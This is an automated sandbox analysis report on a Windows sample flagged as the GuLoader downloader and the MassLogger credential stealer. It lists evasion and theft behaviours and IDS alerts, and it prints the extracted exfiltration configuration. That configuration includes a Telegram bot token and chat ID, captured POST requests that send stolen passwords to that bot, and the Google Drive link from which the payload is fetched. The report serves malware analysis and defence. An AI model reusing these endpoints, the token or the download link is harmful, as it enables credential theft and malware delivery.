Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FILHKLtCw0.exe

Overview

General Information

Sample name:FILHKLtCw0.exe
renamed because original name is a hash value
Original sample name:12ba9e377bd0dd9470038a28d9c076d28bd8e4bc9c419148a7ae4c20b7a831ba.exe
Analysis ID:1587996
MD5:a2c795a981ddc798d11ec6e3ade42301
SHA1:e650b31efaf33eaf34f92fea24e56d130d91a1f9
SHA256:12ba9e377bd0dd9470038a28d9c076d28bd8e4bc9c419148a7ae4c20b7a831ba
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • FILHKLtCw0.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\FILHKLtCw0.exe" MD5: A2C795A981DDC798D11EC6E3ADE42301)
    • FILHKLtCw0.exe (PID: 5852 cmdline: "C:\Users\user\Desktop\FILHKLtCw0.exe" MD5: A2C795A981DDC798D11EC6E3ADE42301)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA", "Telegram Chatid": "1934716051"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2868592478.0000000003DC1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: FILHKLtCw0.exe PID: 5852JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T20:24:10.630821+010020577441Malware Command and Control Activity Detected192.168.2.559244149.154.167.220443TCP
            2025-01-10T20:24:14.585687+010020577441Malware Command and Control Activity Detected192.168.2.559246149.154.167.220443TCP
            2025-01-10T20:24:17.898382+010020577441Malware Command and Control Activity Detected192.168.2.559248149.154.167.220443TCP
            2025-01-10T20:24:19.416338+010020577441Malware Command and Control Activity Detected192.168.2.559250149.154.167.220443TCP
            2025-01-10T20:24:21.746582+010020577441Malware Command and Control Activity Detected192.168.2.559252149.154.167.220443TCP
            2025-01-10T20:24:23.224034+010020577441Malware Command and Control Activity Detected192.168.2.559254149.154.167.220443TCP
            2025-01-10T20:24:24.812890+010020577441Malware Command and Control Activity Detected192.168.2.559256149.154.167.220443TCP
            2025-01-10T20:24:26.278739+010020577441Malware Command and Control Activity Detected192.168.2.559258149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T20:24:02.515912+010028032742Potentially Bad Traffic192.168.2.559242193.122.6.16880TCP
            2025-01-10T20:24:09.781628+010028032742Potentially Bad Traffic192.168.2.559242193.122.6.16880TCP
            2025-01-10T20:24:13.719098+010028032742Potentially Bad Traffic192.168.2.559245193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T20:23:56.219592+010028032702Potentially Bad Traffic192.168.2.559240142.250.181.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T20:24:10.431548+010018100081Potentially Bad Traffic192.168.2.559244149.154.167.220443TCP
            2025-01-10T20:24:14.333494+010018100081Potentially Bad Traffic192.168.2.559246149.154.167.220443TCP
            2025-01-10T20:24:17.723033+010018100081Potentially Bad Traffic192.168.2.559248149.154.167.220443TCP
            2025-01-10T20:24:19.237869+010018100081Potentially Bad Traffic192.168.2.559250149.154.167.220443TCP
            2025-01-10T20:24:21.560698+010018100081Potentially Bad Traffic192.168.2.559252149.154.167.220443TCP
            2025-01-10T20:24:23.044538+010018100081Potentially Bad Traffic192.168.2.559254149.154.167.220443TCP
            2025-01-10T20:24:24.566117+010018100081Potentially Bad Traffic192.168.2.559256149.154.167.220443TCP
            2025-01-10T20:24:26.101869+010018100081Potentially Bad Traffic192.168.2.559258149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA", "Telegram Chatid": "1934716051"}
            Source: FILHKLtCw0.exe.5852.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendMessage"}
            Source: FILHKLtCw0.exeReversingLabs: Detection: 60%
            Source: FILHKLtCw0.exeVirustotal: Detection: 75%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838D1EC CryptUnprotectData,4_2_3838D1EC
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_3838D9D9 CryptUnprotectData,4_2_3838D9D9
            Source: FILHKLtCw0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:59243 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:59240 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.5:59241 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:59244 version: TLS 1.2
            Source: FILHKLtCw0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38380671h4_2_383803B0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38381042h4_2_38380C28
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838C985h4_2_3838C638
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838B339h4_2_3838B07F
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838F2F8h4_2_3838F054
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838BBE9h4_2_3838B930
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838C499h4_2_3838C1F2
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838DD40h4_2_3838DA89
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838E5F0h4_2_3838E339
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838EEA0h4_2_3838EBF2
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38381042h4_2_38380C1A
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838B791h4_2_3838B4D8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838C041h4_2_3838BD9C
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838E198h4_2_3838DEE1
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38381042h4_2_38380F6F
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 3838EA48h4_2_3838E790
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then push 00000000h4_2_38EDBDF0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED882Dh4_2_38ED8650
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED91B7h4_2_38ED8650
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED7318h4_2_38ED7070
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED1B00h4_2_38ED1858
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED4ACAh4_2_38ED4820
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED2C60h4_2_38ED29B8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38ED8193
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then push 00000000h4_2_38EDC92F
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED23B0h4_2_38ED2108
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED5D60h4_2_38ED5AB8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED3510h4_2_38ED3268
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED54B0h4_2_38ED5208
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38EDCBE7
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED4670h4_2_38ED43C8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED6610h4_2_38ED6368
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38ED8373
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38ED7B4F
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED3DC0h4_2_38ED3B18
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED7770h4_2_38ED74C8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED1F58h4_2_38ED1CB0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED16A8h4_2_38ED1400
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED6EC0h4_2_38ED6C18
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED5058h4_2_38ED4DB0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED2808h4_2_38ED2560
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED3968h4_2_38ED36C0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED5908h4_2_38ED5660
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED30B8h4_2_38ED2E10
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED6A68h4_2_38ED67C0
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED1250h4_2_38ED0FA8
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED4218h4_2_38ED3F70
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then jmp 38ED61B8h4_2_38ED5F10
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4x nop then push 00000000h4_2_3940E870

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:59244 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:59252 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:59244 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:59248 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:59248 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:59246 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:59246 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:59258 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:59252 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:59258 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:59250 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:59250 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:59256 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:59256 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:59254 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:59254 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.5:58977 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.5:54306 -> 1.1.1.1:53
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3182720a9442Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31b1cb1e2887Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31db50b888a4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ebdb3d617fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320498b12c56Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3216662c95dfHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3226cb0eef66Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3239ddc2fe6eHost: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:59245 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:59242 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:59240 -> 142.250.181.238:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:59243 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3182720a9442Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000361FB000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.00000000362AF000.00000004.00000800.00020000.00000000.sdmp, FILHKLtCw0.exe, 00000004.00000002.3309261776.0000000036318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
